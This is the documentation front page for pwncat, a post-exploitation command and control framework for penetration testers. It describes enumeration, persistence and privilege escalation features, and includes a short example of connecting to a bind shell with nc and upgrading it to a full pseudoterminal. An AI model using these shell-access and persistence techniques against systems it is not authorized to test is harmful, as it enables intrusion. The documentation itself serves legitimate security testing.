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.. pwncat documentation master file, created by
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sphinx-quickstart on Mon May 18 01:30:55 2020.
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You can adapt this file completely to your liking, but it should at least
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contain the root `toctree` directive.
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pwncat - living off the land... in style!
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=========================================
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pwncat is a command and control framework which turns a basic reverse or bind
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shell into a fully-featured exploitation platform. After initial connection, the
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framework will probe the remote system to identify useful binaries natively
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available on the target system. It will then attempt to start a pseudoterminal
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on the remote host and provide you with raw terminal access.
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pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
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programmatically interact with the remote host alongside your terminal access.
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pwncat provides you with a local shell interface which can utilize your
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connection for enumeration, file upload/download, automatic persistence
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installation and even automated privilege escalation.
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This abstracted remote host access is also available to the user via custom
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commands, privilege escalation methods, and persistence methods. You can find
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out more about this framework under the API Documentation below!
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What's wrong with just a reverse shell?
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You may be familiar with the common method of getting raw terminal access with
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reverse shells. It normally goes something like this:
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.. code-block:: bash
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# Connect to a remote bind shell
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nc 1.1.1.1 4444
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# Spawn a remote pseudoterminal
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remote$ python -c "import pty; pty.spawn('/bin/bash')"
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# Background your raw shell
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remote$ C-z
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# Set local terminal to raw mode
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local$ stty raw -echo
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# Foreground your remote shell
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local$ fg
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# You now have a full terminal that doesn't exit on C-c and
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# supports keyboard shortcuts, history, graphical terminal
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# applications, etc.
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remote$
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This works well. However, the added steps to get a reverse shell are laborious
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after a while. Also, the danger of losing your remote shell by accidentally
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pressing "C-c" prior to gaining raw access is high. This was the original
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inspiration of this project.
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Where Do I Begin?
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-----------------
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pwncat has a lot features, and is easily extensible if you have ideas! Check
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out the "Basic Usage" section next for examples of connecting to remote hosts.
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If you ever find there is a piece of the documentation missing, check out the help
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documentation at the local prompt, accessed with the ``--help/-h`` parameter of any
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command. If the information you're looking for doesn't exist, please submit an issue
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on GitHub. If you're feeling adventurous, take a look at the API documentation as
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well. Pull requests are always welcome!
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.. toctree::
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:maxdepth: -1
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:caption: Contents:
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installation.rst
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usage.rst
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windows.rst
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configuration.rst
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modules.rst
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enum.rst
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privesc.rst
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persist.rst
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commands/index.rst
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api/pwncat.rst
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Indices and tables
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==================
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* :ref:`genindex`
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* :ref:`modindex`
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* :ref:`search`
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